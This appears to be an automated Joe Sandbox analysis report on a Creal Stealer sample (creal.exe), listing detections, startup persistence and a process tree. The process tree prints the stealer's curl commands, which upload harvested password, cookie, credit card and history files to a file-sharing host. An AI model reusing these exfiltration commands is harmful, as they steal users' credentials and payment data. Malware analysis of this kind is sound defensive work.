Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
creal.exe

Overview

General Information

Sample name:creal.exe
Analysis ID:1592536
MD5:da1695dba8bd25d00e05e7769d6d7e8e
SHA1:884c5b84185bfcc06b2f82474642e23af842cf26
SHA256:7166d6cc2435061f32cf982dba8f6ec27fc23a46c9705aa52fb2ba08eb7011aa
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

Python Stealer, Creal Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Creal Stealer
AI detected suspicious sample
Drops PE files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal communication platform credentials (via file / registry access)
Yara detected Generic Python Stealer
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • creal.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\creal.exe" MD5: DA1695DBA8BD25D00E05E7769D6D7E8E)
    • creal.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\creal.exe" MD5: DA1695DBA8BD25D00E05E7769D6D7E8E)
      • cmd.exe (PID: 7648 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7700 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 1528 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 748 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 6432 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 7608 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 4696 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 3720 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 1556 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 1944 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 2052 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 3252 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 2624 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 3004 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • dllhost.exe (PID: 7648 cmdline: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • creal.exe (PID: 4292 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe" MD5: DA1695DBA8BD25D00E05E7769D6D7E8E)
    • creal.exe (PID: 4992 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe" MD5: DA1695DBA8BD25D00E05E7769D6D7E8E)
      • cmd.exe (PID: 7808 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7852 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 3492 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 3480 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 6844 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 1080 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 1912 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 2024 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 3632 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 2292 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 316 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 3004 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
      • cmd.exe (PID: 3412 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 6564 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001C.00000003.1716089607.000002085E24E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CrealStealerYara detected Creal StealerJoe Security
    0000001C.00000003.1717159393.000002085E25C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CrealStealerYara detected Creal StealerJoe Security
      0000001C.00000003.1715402115.000002085F215000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CrealStealerYara detected Creal StealerJoe Security
        0000001C.00000003.1713151539.000002085E24C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CrealStealerYara detected Creal StealerJoe Security
          0000001C.00000003.1711307435.000002085F388000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CrealStealerYara detected Creal StealerJoe Security
            Click to see the 46 entries

            Sigma Signatures

            Sigma detected: Startup Folder File Write
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\creal.exe, ProcessId: 7612, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile", CommandLine: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\creal.exe", ParentImage: C:\Users\user\Desktop\creal.exe, ParentProcessId: 7612, ParentProcessName: creal.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile", ProcessId: 1528, ProcessName: cmd.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: creal.exeAvira: detected
            Antivirus detection for URL or domain
            Source: https://discord.gift/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: creal.exeVirustotal: Detection: 79%Perma Link
            Source: creal.exeReversingLabs: Detection: 75%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: geolocation-db.com
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7176244 CRYPTO_memcmp,2_2_00007FF8E7176244
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71718E0 _Py_NoneStruct,_PyArg_UnpackKeywords,PyObject_GetBuffer,PyBuffer_IsContiguous,PyObject_GetBuffer,PyBuffer_IsContiguous,PyLong_AsUnsignedLong,PyLong_AsUnsignedLong,PyLong_AsUnsignedLong,EVP_PBE_scrypt,PyBytes_FromStringAndSize,PyEval_SaveThread,EVP_PBE_scrypt,PyEval_RestoreThread,PyExc_ValueError,PyErr_SetString,PyBuffer_Release,PyBuffer_Release,PyLong_AsLong,PyErr_Occurred,PyLong_AsLong,PyErr_Occurred,PyExc_ValueError,PyExc_ValueError,PyErr_Format,_PyArg_BadArgument,_PyArg_BadArgument,_PyArg_BadArgument,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,PyErr_Occurred,PyExc_TypeError,_PyArg_BadArgument,_PyArg_BadArgument,PyExc_OverflowError,PyExc_OverflowError,_Py_Dealloc,PyExc_ValueError,2_2_00007FF8E71718E0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7218E50 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,2_2_00007FF8E7218E50
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E721E870 CRYPTO_free,2_2_00007FF8E721E870
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71F0880 X509_VERIFY_PARAM_free,CRYPTO_free_ex_data,BIO_pop,BIO_free,BIO_free_all,BIO_free_all,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,CRYPTO_THREAD_lock_free,CRYPTO_free,2_2_00007FF8E71F0880
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7212890 ERR_new,ERR_set_debug,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,BN_clear_free,2_2_00007FF8E7212890
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7214880 CRYPTO_malloc,memset,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,2_2_00007FF8E7214880
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D23EC EVP_MD_get_size,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_clear_free,CRYPTO_malloc,ERR_new,ERR_set_debug,2_2_00007FF8E71D23EC
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E721E8D0 CRYPTO_free,2_2_00007FF8E721E8D0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1B54 memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,memcmp,EVP_CIPHER_CTX_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,memcpy,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,2_2_00007FF8E71D1B54
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E721E731 CRYPTO_free,CRYPTO_free,2_2_00007FF8E721E731
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71EE72A CRYPTO_THREAD_write_lock,2_2_00007FF8E71EE72A
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71EE72C CRYPTO_THREAD_write_lock,2_2_00007FF8E71EE72C
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1AB4 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,2_2_00007FF8E71D1AB4
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7228700 CRYPTO_free,CRYPTO_memdup,2_2_00007FF8E7228700
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1893 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug,2_2_00007FF8E71D1893
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D26F8 BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,2_2_00007FF8E71D26F8
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D198D CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,2_2_00007FF8E71D198D
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D24DC CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,2_2_00007FF8E71D24DC
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71E27B0 CRYPTO_THREAD_run_once,2_2_00007FF8E71E27B0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7234780 ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,2_2_00007FF8E7234780
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D223E ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,2_2_00007FF8E71D223E
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D103C CRYPTO_malloc,COMP_expand_block,2_2_00007FF8E71D103C
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1217 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,2_2_00007FF8E71D1217
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E721E6B0 CRYPTO_free,2_2_00007FF8E721E6B0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E72046B0 CRYPTO_realloc,memcpy,ERR_new,ERR_set_debug,ERR_set_error,2_2_00007FF8E72046B0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71F26C0 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_dup,X509_VERIFY_PARAM_new,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_new_ex_data,2_2_00007FF8E71F26C0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D16A4 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,2_2_00007FF8E71D16A4
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D2036 CRYPTO_free,2_2_00007FF8E71D2036
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D24FA CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,2_2_00007FF8E71D24FA
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1488 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,2_2_00007FF8E71D1488
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71DE592 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,2_2_00007FF8E71DE592
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D2059 CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,2_2_00007FF8E71D2059
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1AC3 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,2_2_00007FF8E71D1AC3
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1D98 EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,CRYPTO_zalloc,EVP_MAC_CTX_free,EVP_MAC_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_fetch,EVP_MAC_CTX_new,EVP_MAC_free,EVP_CIPHER_CTX_new,EVP_CIPHER_fetch,OSSL_PARAM_construct_utf8_string,OSSL_PARAM_construct_end,EVP_MAC_init,EVP_DecryptInit_ex,EVP_CIPHER_free,EVP_CIPHER_free,EVP_CIPHER_free,EVP_MAC_CTX_get_mac_size,EVP_CIPHER_CTX_get_iv_length,EVP_MAC_final,CRYPTO_memcmp,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,memcpy,ERR_clear_error,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MAC_CTX_free,CRYPTO_free,2_2_00007FF8E71D1D98
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1EE7 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,_time64,memcpy,EVP_MD_get0_name,EVP_MD_is_a,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,2_2_00007FF8E71D1EE7
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D15E1 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,memcpy,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,2_2_00007FF8E71D15E1
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D6460 BIO_get_data,BIO_get_shutdown,BIO_get_init,BIO_clear_flags,BIO_set_init,CRYPTO_free,2_2_00007FF8E71D6460
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D1627 EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,ERR_set_debug,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free,2_2_00007FF8E71D1627
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7248450 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_new,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,2_2_00007FF8E7248450
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D18B6 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,2_2_00007FF8E71D18B6
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71DE4A0 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,2_2_00007FF8E71DE4A0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71FE4F0 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,2_2_00007FF8E71FE4F0
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D19DD BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,CRYPTO_free,CRYPTO_strdup,2_2_00007FF8E71D19DD
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E7228330 CRYPTO_memcmp,2_2_00007FF8E7228330
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71D4330 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,2_2_00007FF8E71D4330
